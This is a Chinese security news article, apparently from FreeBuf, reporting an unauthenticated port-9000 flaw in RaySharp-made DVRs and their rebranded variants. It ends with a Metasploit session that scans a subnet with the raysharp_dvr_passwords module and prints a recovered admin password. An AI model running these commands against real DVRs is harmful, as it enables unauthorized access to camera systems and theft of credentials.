DVR漏洞使黑客轻松控制CCTV摄像机(MSF已更新模块)

安全
安全研究人员称,CCTV众多视频录制设备正面临被黑风险,黑客可以监控、复制和删除视频流。

安全研究人员称,CCTV众多视频录制设备正面临被黑风险,黑客可以监控、复制和删除视频流。

安全人员补充到,除非系统安装了合适的固件,否则DVR平台固件都能成为攻击者向这些网络视频设备进行攻击的切入点。这些易受攻击的CCTV设备是总部位于广东的RaySharp公司生产的。

攻击上周首先被发现,黑客可以通过DVR 9000端口发送命令而无须任何认证,这样黑客就可直接进入到DVR的web控制面板。更悲催的是DVR通常支持UPnP(通用即插即用,可以通过网络驱动设备),网上就能实施控制。此外,RaySharp DVR还以明文形式存储用户名和密码。

事实上,受影响的厂商还包括:Swann, Lorex, URMET, KGuard, Defender, DEAPA/DSP Cop, SVAT, Zmodo, BCS, Bolide, EyeForce, Atlantis, Protectron, Greatek, Soyo, Hi-View, Cosmos, and J2000等等。扫描显示,全世界150多个国家超过58000视频设备可被攻击。

DVR漏洞使黑客轻松控制CCTV摄像机(MSF已更新模块)

metasploit下已有了相关模块:

$ sudo -s -E

# msfconsole

msf> use auxiliary/scanner/misc/raysharp_dvr_passwords

msf  auxiliary(raysharp_dvr_passwords) > set RHOSTS 192.168.0.0/24

msf  auxiliary(raysharp_dvr_passwords) > set THREADS 256

msf  auxiliary(raysharp_dvr_passwords) > run

[+] 192.168.0.153:9000 (user='admin' pass='1234546') mac=00-23-63-63-63-63 version=V2.1-20110716

附:

RaySharp安联锐视,是全球领先的数字视频监控解决方案提供商,以珠海为总部,营销网络覆盖全球近百个国家和地区。安联锐视在中国先后为北京天安门广场、2008年北京奥运会场馆、深圳国际会展中心、中山市政府和澳门大学横琴校区等数百万企事业单位、商业机构、公共事业、政府机关和家庭社区提供数字监控服务。
 

责任编辑:蓝雨泪 来源: freebuf
相关推荐

2020-08-18 16:21:36

安全黑客摄像机

2020-05-28 17:25:08

安防AI机器视觉华为

2014-08-25 13:10:20

2022-10-25 10:32:56

人工智能摄像机

2020-06-18 11:20:17

网络安全物联网技术

2015-09-08 10:15:16

2022-08-23 14:51:02

漏洞网络攻击

2010-10-27 09:48:10

2009-03-09 14:46:50

2018-08-31 14:22:41

网络摄像机监控

2015-05-12 15:57:33

2023-06-11 17:24:26

2015-03-10 10:39:08

2010-07-01 21:51:43

网络摄像机IP监控D-Link

2013-11-28 11:09:28

2021-03-29 22:29:55

华为

2014-04-29 14:08:40

OpenGL ESAndroid应用投影

2013-12-17 15:12:13

2013-10-15 15:46:57

2018-03-05 16:07:38

智能摄像机
点赞
收藏

51CTO技术栈公众号